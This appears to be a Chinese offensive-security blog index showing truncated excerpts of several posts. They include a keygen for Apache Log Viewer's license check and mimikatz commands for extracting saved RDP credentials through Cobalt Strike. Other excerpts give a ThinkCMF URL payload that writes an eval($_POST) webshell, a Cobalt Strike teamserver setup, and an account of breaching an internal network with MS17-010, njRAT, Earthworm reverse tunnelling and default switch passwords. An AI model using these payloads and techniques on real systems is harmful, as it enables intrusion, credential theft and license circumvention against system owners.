Apache Log Viewer 5.X 注册机
抽空研究了下ALV的注册机制,写了个注册机
分析ALV的注册方法是unlockCodeToolStripMenuItem_Click方法,当点击Unlock按钮时会触发注册事件并调用Class2类中的smethod_1、smethod_02个方法进行校验,详细流程见如下代码
unlockCodeToolStripMenuItem_Click方法
private void unlockCodeToolStripMenuItem_Click(object sender, EventArgs e) { string text = this.prefs_0.Key; if (!InputForm.smethod_3("Apache Logs Viewer | " + Class96.smethod_264(), Class96.smethod_143(), ref text)) { return; } if (text != null) { text = text.Trim(); } if (st ...
浪潮ClusterEngineV4.0远程代码执行
c1eaa03b761144d4b351aa8bd40bf7eb6cf248c937441009eef2d13e0b49b0ddd8f41f80c4819f78f66fbf9d0d42c1b42e93892e9631c73b0ab43677392f07637fe67c34bce60fa22292c451a4f8da0894d4424fd875617c575d58066488eca95c75256ba75f2b066b26dafd85390092c8b25e275be03fda676b9c45b92b7cbba662310b16f94b50d6404506a4d2b5984600f81223dec5dacbf03641bd817613fe3d81a3fdfff83c6c46b1f2e0a5b9fc9f10e7fe4f4e6ede39e9aea36596aab061f40d338f03940fb815b30e63cb64991adbbe89801abec5bdf17692d03b50a0950765671dbcf33f054bc88f2892e336b54b7f3c24e53b259 ...
获取远程主机保存的RDP凭据密码
拿下一台运维机,上了个CS,发现曾经连接过几台服务器并且保存了凭据,网上查了圈发现CS不支持交互式mimikatz,记录下获取远程主机RDP凭据。
Windows保存RDP凭据的目录是C:\Users\用户名\AppData\Local\Microsoft\Credentials
可通过命令行获取,执行: cmdkey /list或powerpick Get-ChildItem C:\Users\rasta_mouse\AppData\Local\Microsoft\Credentials\ -Force注意:cmdkey /list命令务必在Session会话下执行,system下执行无结果。
使用cobalt strike中的mimikatz可以获取一部分接下来要用到的masterkey和pbData
mimikatz dpapi::cred /in:C:\Users\USERNAME\AppData\Local\Microsoft\Credentials\SESSIONID
输出应类似
**BLOB** dwVersion : 00000001 - 1 ...
ThinkCMF缓存getshell
前一阵子接到个项目,目标站是thinkCMF2.X搭建的,试过网上很多方法无法拿下,本地搭了个环境测试了下,最终成功拿下
由于thinkcmf2.x使用了thinkphp3.x作为开发框架,默认情况下启用了报错日志并且开启了模板缓存,导致可以使用加载一个不存在的模板来将生成一句话的PHP代码写入data/runtime/Logs/Portal目录下的日志文件中,再次包含该日志文件即可在网站根目录下生成一句话木马m.php
日志文件格式为YY_MM_DD.log,如当前日期为2019年12月12日,日志文件为19_12_12.log,完整路径为data/runtime/Logs/Portal/19_12_12.log
测试成功的环境Linux
宝塔[PHP7.2]
Windwos
PHPstudy PHP7.1
Payload1:首先访问http://target.domain/?a=display&templateFile=%3C?php%20file_put_contents(%27m.php%27,%27%3C%3fphp+eval($_POST[%22X%22]) ...
Cobalt Strike Teamserer的搭建
记录下Cobalt Strike Teamserer的搭建
环境如下
Ubuntu 18.04
Cobalt Strike 3.14
准备一台Ubuntu 18.04的服务器,下载Cobalt Strike完整文件并传到服务器上
安装JDK1.8
apt install openjdk-8-jdk -y
装好后尝试执行./teamserver 10.16.11.55 cSro0t进行验证
启动成功
添加服务vi /etc/systemd/system/cobaltstrike.service
[Unit]Description=CS ServiceAfter=network.targetWants=network.target[Service]Type=simplePIDFile=/run/CS.pidWorkingDirectory=/path_to_cobaltstrike_root_directory/ExecStart=/path_to_cobaltstrike_root_directory/teamserver YOUR_SERVER_IP YOUR_PAS ...
复盘从一个监控主机到核心路由沦陷
在对内网进行ms17-010扫描时,发现2台之前没有出现过且没有打补丁的主机,于是,尝试了一波
kali主机在扫描时发现2台之前没有出现过且没有打补丁的主机
尝试打了一波
然后种了个njrat
翻文件的时候发现了点配置文件
down下来解压后发现是交换机的配置文件,于是有了一个大胆的想法
查看了被控主机的网络连接后,发现一个地址无法ping通,TCP包也无法到达,推测做了ACL
于是在被控机上搭了earthworm做转发
本机执行ew -s rcsocks -l 本地代理端口 -e 远端连接端口
被控机执行ew -s rssocks -d 主控机IP -e 远端连接端口
然后开启proxifier的代理功能,成功访问了那个系统,但这不是主要目的
在咨询了好哥们后,他建议尝试搞搞交换机看看
在对10.2.66/24网段扫描后发现10.2.66.254开放了80和23端口,尝试xshell连接
成功使用huawei密码[email protected]连接,继续翻上级路由
发现了10.2.20.1
继续telnet
继续翻
发现10.2.20.58
继续翻,翻到 ...